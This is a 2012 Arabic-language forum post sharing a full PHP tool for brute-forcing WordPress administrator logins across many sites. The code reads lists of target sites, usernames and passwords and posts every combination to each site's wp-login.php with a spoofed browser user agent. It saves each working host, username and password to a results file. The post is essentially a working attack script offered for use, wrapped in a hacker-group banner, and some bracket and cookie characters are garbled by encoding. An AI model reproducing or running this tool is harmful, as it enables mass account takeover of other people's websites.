al-swisre | 09-26-2012 12:48 AM | اداة تخمين على الوردبريس - Wordpress Brute Forcer السلام عليكم ورحمة الله وبركاته
اداة لتخمين الوردبريس تحتاج فقط الى مترجم php
تعطيها لستت مواقع ولستت يوزرات وايضا لستت الباسوردات شرح الادة على اليوتيوب كود PHP: <?php
/*
author..............: s3n4t00r home................: sec-w.com & v99x.com twitter.............: @al_swisre tool name...........: wsec_wp v1.0 Demonstration ......: http://goo.gl/vots5
*/
if (!extension_loaded('curl')) die("cURL extension required\n"); error_reporting(0); set_time_limit(0); $wp_crack = new s3n4t00r_wp_cracker();
print_r("\n
.oPYo. .8 o .oPYo. .oPYo. `8 d'8 8 8 .o8 8 .o8 .oPYo. .oP' odYo. d' 8 o8P 8 .P'8 8 .P'8 oPYo. Yb.. `b. 8' `8 Pooooo 8 8.d' 8 8.d' 8 8 `' 'Yb. :8 8 8 8 8 8o' 8 8o' 8 8 `YooP' `YooP' 8 8 8 8 `YooP' `YooP' 8 :.....::.....:..::..::::..:::..::.....::.....:..:::: :::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::::::::::::
\n\n # Programmer : s3n4t00r | @al_swisre
# Home : Sec-w.com & V99x.com
# Greets 4 : Exp-Bl00d - Saudi Eagle
\n***91;****93; list site (1/3) :");
$file_host = $wp_crack->stdin();
echo "\n\n***91;****93; list user (2/3) :";
$file_user = $wp_crack->stdin();
echo "\n\n***91;****93; list pass (2/3) :";
$file_pass = $wp_crack->stdin();
$crack = $wp_crack->cracker($file_host,$file_user,$file_pass);
if($crack){die('# END Brute Forcer - S3n4t00r');}
class s3n4t00r_wp_cracker{
public function cracker($file_host,$file_user,$file_pass){
$list_host = file_get_contents($file_host) or die ("\n WTF list host not found ?");
$list_user = file_get_contents($file_user) or die (" \n WTF list user not found ? \n");
$list_pass = file_get_contents($file_pass) or die (" \n WTF list pass not found ? \n");
$exp_host = explode("\n",$list_host);
$exp_user = explode("\n",$list_user);
$exp_pass = explode("\n",$list_pass);
$c_host = count($exp_host);
$c_user = count($exp_user);
$c_pass = count($exp_pass);
echo " |=================================================+ | Host : $file_host - ($c_host) | | Username : $file_user - ($c_user) | | Password : $file_pass - ($c_pass) | | Start Brute Forcer > > > |=================================================+ \n"; flush();
foreach ($exp_host as $host){
$host = str_replace('http://','',trim($host));
$get = get_headers("http://$host/wp-login.php");
if(!preg_match("/200 OK/",$get***91;0***93;)){continue; flush(); }
foreach($exp_user as $user) {
flush();
foreach($exp_pass as $pass){
flush();
$host = trim($host); $user = trim($user); $pass = trim($pass);
echo "***91;-***93; Testing -> $host:$user:$pass \n";
$login = $this->login($host,$user,$pass);
if($login){echo "\n ***91;+***93; Found : $host:$user:$pass \n\n";
$this->save($host,$user,$pass);
flush(); }else{continue;}
flush(); } flush();
} flush();
}
return true;
}
private function login($host,$user,$pass){
$curl = curl_init(); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS,"log=$user&pwd=$pass&rememberme=forever&wp-submit=Log In&test******=1"); curl_setopt($curl, CURLOPT_URL,"http://".$host."/wp-login.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_VERBOSE,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)'); curl_setopt($curl, CURLOPT_******JAR,"******.txt"); curl_setopt($curl, CURLOPT_******FILE,"******.txt"); $ex = curl_exec($curl);
if($ex){
if(!preg_match('/ERROR/',$ex)){
curl_close($curl);
return true;
}
}
curl_close($curl);
return false;
}
private function save($host,$user,$pass){
$f = fopen('wp_result.txt','ab'); $w = fwrite($f,"***91;$host***93; - ***91;$user***93; - ***91;$pass) \n \n"); if($w){return true;}
}
public function stdin(){ $fp = fopen("php://stdin","r"); $line = trim(fgets($fp)); fclose($fp); return $line; }
//end class }
?> الحقوق لـ عالم الحماية |